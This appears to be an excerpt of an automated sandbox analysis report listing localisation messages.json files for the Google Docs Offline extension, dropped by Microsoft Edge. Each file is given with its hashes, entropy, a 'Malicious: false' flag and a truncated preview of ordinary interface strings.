C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	5.292894989863142
Encrypted:	false
SSDEEP:	24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
MD5:	15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:	4017FC6D8B302335469091B91D063B07C9E12109
SHA-256:	34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
SHA-512:	427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\ka\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	3.586016059431306
Encrypted:	false
SSDEEP:	48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:	83F81D30913DC4344573D7A58BD20D85
SHA1:	5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:	30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:	85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:	false
Preview:	{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\kk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3235
Entropy (8bit):	3.6081439490236464
Encrypted:	false
SSDEEP:	96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:	2D94A58795F7B1E6E43C9656A147AD3C
SHA1:	E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:	548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:	F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:	false
Preview:	{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\km\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3122
Entropy (8bit):	3.891443295908904
Encrypted:	false
SSDEEP:	96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:	B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:	1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:	A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:	1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:	false
Preview:	{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\kn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1895
Entropy (8bit):	4.28990403715536
Encrypted:	false
SSDEEP:	48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
MD5:	38BE0974108FC1CC30F13D8230EE5C40
SHA1:	ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
SHA-256:	30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
SHA-512:	7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.3945675025513955
Encrypted:	false
SSDEEP:	24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:	F3E59EEEB007144EA26306C20E04C292
SHA1:	83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:	C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:	7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\lo\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2535
Entropy (8bit):	3.8479764584971368
Encrypted:	false
SSDEEP:	48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:	E20D6C27840B406555E2F5091B118FC5
SHA1:	0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:	89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:	AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:	false
Preview:	{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	4.797571191712988
Encrypted:	false
SSDEEP:	24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:	970544AB4622701FFDF66DC556847652
SHA1:	14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:	5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:	CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.700308832360794
Encrypted:	false
SSDEEP:	24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:	A568A58817375590007D1B8ABCAEBF82
SHA1:	B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:	0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:	FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\ml\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	4.358252286391144
Encrypted:	false
SSDEEP:	24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:	4717EFE4651F94EFF6ACB6653E868D1A
SHA1:	B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:	22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:	487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\mn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2778
Entropy (8bit):	3.595196082412897
Encrypted:	false
SSDEEP:	48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:	83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:	1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:	613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:	3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:	false
Preview:	{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\mr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	4.287702203591075
Encrypted:	false
SSDEEP:	48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:	3B98C4ED8874A160C3789FEAD5553CFA
SHA1:	5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:	ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:	5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\ms\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.457879437756106
Encrypted:	false
SSDEEP:	24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:	7D273824B1E22426C033FF5D8D7162B7
SHA1:	EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:	2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:	E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\my\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3830
Entropy (8bit):	3.5483353063347587
Encrypted:	false
SSDEEP:	48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:	342335A22F1886B8BC92008597326B24
SHA1:	2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:	243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:	CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:	false
Preview:	{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\ne\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1898
Entropy (8bit):	4.187050294267571
Encrypted:	false
SSDEEP:	24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:	B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:	74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:	E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:	7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.513485418448461
Encrypted:	false
SSDEEP:	12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:	32DF72F14BE59A9BC9777113A8B21DE6
SHA1:	2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:	F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:	E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\no\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	4.4541485835627475
Encrypted:	false
SSDEEP:	24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:	A1744B0F53CCF889955B95108367F9C8
SHA1:	6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:	21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:	F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:	false
